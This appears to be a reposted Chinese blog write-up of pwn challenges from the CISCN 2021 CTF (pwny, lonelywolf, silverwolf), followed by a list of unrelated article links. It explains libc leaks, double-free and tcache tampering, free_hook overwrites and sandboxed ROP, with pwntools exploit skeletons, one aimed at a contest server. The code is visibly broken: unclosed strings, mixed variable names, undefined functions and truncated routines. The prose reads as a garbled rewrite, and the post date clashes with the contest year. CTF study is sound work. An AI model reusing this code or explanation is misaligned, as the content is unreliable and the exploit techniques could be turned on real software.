博客
关于我
ciscn2021西北部分pwn
阅读量:677 次
发布时间:2019-03-17

本文共 2337 字,大约阅读时间需要 7 分钟。

打了一天的国赛,发现自己还是太菜了

pwny

在分析程序时,发现可以通过读取随机数到bss段上作为文件描述符范围,在0~0xff之间。随后,在自定义的函数sub_ba0中发现可以根据偏移进行任意写的操作,sub_b20则允许根据偏移进行任意读操作。这使得我们能够覆盖fd的值,将其设置为0,从而实现在文件描述符上进行任意读写操作。

为了达到这个目的,我们首先需要通过泄露出bss段上的stdout指针来获得_IO_2_1_stdout_的地址,从而推导出libc的基地址。随后,利用data段上的off_202008泄露bss段的地址,进一步通过libc中的environ变量泄露栈地址。通过这些信息,可以将onegadget链写到栈上的返回地址中,获得最终的shell控制。然而,直接使用(exp)函数进行远程调试会被防护措施阻止。解决方案是在二进制程序中直接将fd设置为0,从而方便进行调试。

代码示例如下:
from pwn import *
io = process('./pwny')
elf = ELF('./pwny')
libc = elf.libc
context(log_level='debug')
def read():
io.recvuntil('Your choice: ')
io.send('1 ')
io.recvuntil('Index: ')
def write(a1):
io.recvuntil('Your choice: ')
io.send('2 ')
io.recvuntil('Index: ')
def exp():
write(256)
gdb.attach(io)
read()
# 撰写exp函数的具体实现,确保能够获得libc基地址和其他所需信息

通过上述方法,我们能够成功地获取到libc的基地址、system函数的地址以及最终的binsh地址,从而实现shell控制。这一过程展示了如何在实际编程中应对各种防护机制,并利用细节来实现漏洞利用。

lonelywolf

在处理这个问题时,发现漏洞在dele函数中没有正确清空free后的指针,导致doublefree的问题。一旦触发这个漏洞,可以通过控制tcache_struct和free_cache_struct的count值来泄露libc的基地址。随后,通过修改fd指针的值,利用free_hook和__free_hook-0x8的位置,进一步获取到shell控制。

代码示例如下:
from pwn import *
io = remote('124.70.20.79', 22175)
def add(a1, a2):
io.sendafter('Your choice: ', '1 ')
io.sendafter('Index: ', str(a1) + ')
def edit(a1, a2):
io.sendafter('Your choice: ', '2 ')
io.sendafter('Index: ', str(a1) + ')
def show(a1):
io.sendafter('Your choice: ', '3 ')
io.sendafter('Index: ', str(a1) + ')
def dele(a1):
io.sendafter('Your choice: ', '4 ')
def exp():
add(0, 96)
dele(0)
edit(0, p64(0) * 2)
dele(0)
show(0)
heapbase = u64(io.recv(6).ljust(8, '\x00')) - 0x200 - 0x400 + 0x800

silverwolf

这是一个沙箱堆题,libc版本为2.27。通过仔细分析程序逻辑,发现可以利用heapchunk的可写大小(通常为0x78)来构造rop链。具体来说,利用environ变量将一个chunk申请到栈上,再通过修改返回地址实现控制。这一过程需要注意open函数的实现方式,避免因沙箱效应无法绕过。但在实际操作中,可能需要多次尝试才能找到最优解法。

代码示例如下:
from pwn import *
io = process('./silverwolf')
elf = ELF('./silverwolf')
libc = elf.libc
context.terminal=['tmux','splitw','-h']
def menu(ch):
p.sendlineafter('choice:', str(ch))
def add(size):
menu(1)
p.sendlineafter('Index:', '0')
p.sendlineafter('Size:', str(size))
def edit(content):
menu(2)
p.sendlineafter('Index:', '0')
p.sendlineafter('Content:', content)
def show():
menu(3)
p.sendlineafter('Index:', '0')
def exp():
add(0x78)
dele(0)
edit('./flag\x00')
add(0x78)
add(0x78)
edit('\x00'*0x23 + '\x07')
dele(0)
show(0)
heapbase = u64(p.recv(6).ljust(8, '\x00')) - 0x1880 - 0x940 - 0x70

转载地址:http://jxgqz.baihongyu.com/

你可能感兴趣的文章
ngModelController
查看>>
ngrok | 内网穿透,支持 HTTPS、国内访问、静态域名
查看>>
ngrok内网穿透可以实现资源共享吗?快解析更加简洁
查看>>
NHibernate学习[1]
查看>>
NHibernate异常:No persister for的解决办法
查看>>
NIFI1.21.0_java.net.SocketException:_Too many open files 打开的文件太多_实际操作---大数据之Nifi工作笔记0051
查看>>
NIFI1.21.0_Mysql到Mysql增量CDC同步中_日期类型_以及null数据同步处理补充---大数据之Nifi工作笔记0057
查看>>
NIFI1.21.0_Mysql到Mysql增量CDC同步中_补充_更新时如果目标表中不存在记录就改为插入数据_Postgresql_Hbase也适用---大数据之Nifi工作笔记0059
查看>>
NIFI1.21.0_NIFI和hadoop蹦了_200G集群磁盘又满了_Jps看不到进程了_Unable to write in /tmp. Aborting----大数据之Nifi工作笔记0052
查看>>
NIFI1.21.0最新版本安装_连接phoenix_单机版_Https登录_什么都没改换了最新版本的NIFI可以连接了_气人_实现插入数据到Hbase_实际操作---大数据之Nifi工作笔记0050
查看>>
NIFI1.21.0通过Postgresql11的CDC逻辑复制槽实现_指定表多表增量同步_增删改数据分发及删除数据实时同步_通过分页解决变更记录过大问题_02----大数据之Nifi工作笔记0054
查看>>
NIFI1.21.0通过Postgresql11的CDC逻辑复制槽实现_指定表多表增量同步_插入修改删除增量数据实时同步_通过分页解决变更记录过大问题_01----大数据之Nifi工作笔记0053
查看>>
NIFI1.21.0通过Postgresql11的CDC逻辑复制槽实现_指定表或全表增量同步_实现指定整库同步_或指定数据表同步配置_04---大数据之Nifi工作笔记0056
查看>>
NIFI1.23.2_最新版_性能优化通用_技巧积累_使用NIFI表达式过滤表_随时更新---大数据之Nifi工作笔记0063
查看>>
NIFI从MySql中增量同步数据_通过Mysql的binlog功能_实时同步mysql数据_根据binlog实现数据实时delete同步_实际操作04---大数据之Nifi工作笔记0043
查看>>
NIFI从MySql中增量同步数据_通过Mysql的binlog功能_实时同步mysql数据_配置binlog_使用处理器抓取binlog数据_实际操作01---大数据之Nifi工作笔记0040
查看>>
NIFI从MySql中增量同步数据_通过Mysql的binlog功能_实时同步mysql数据_配置数据路由_实现数据插入数据到目标数据库_实际操作03---大数据之Nifi工作笔记0042
查看>>
NIFI从MySql中增量同步数据_通过Mysql的binlog功能_实时同步mysql数据_配置数据路由_生成插入Sql语句_实际操作02---大数据之Nifi工作笔记0041
查看>>
NIFI从MySql中离线读取数据再导入到MySql中_03_来吧用NIFI实现_数据分页获取功能---大数据之Nifi工作笔记0038
查看>>
NIFI从MySql中离线读取数据再导入到MySql中_不带分页处理_01_QueryDatabaseTable获取数据_原0036---大数据之Nifi工作笔记0064
查看>>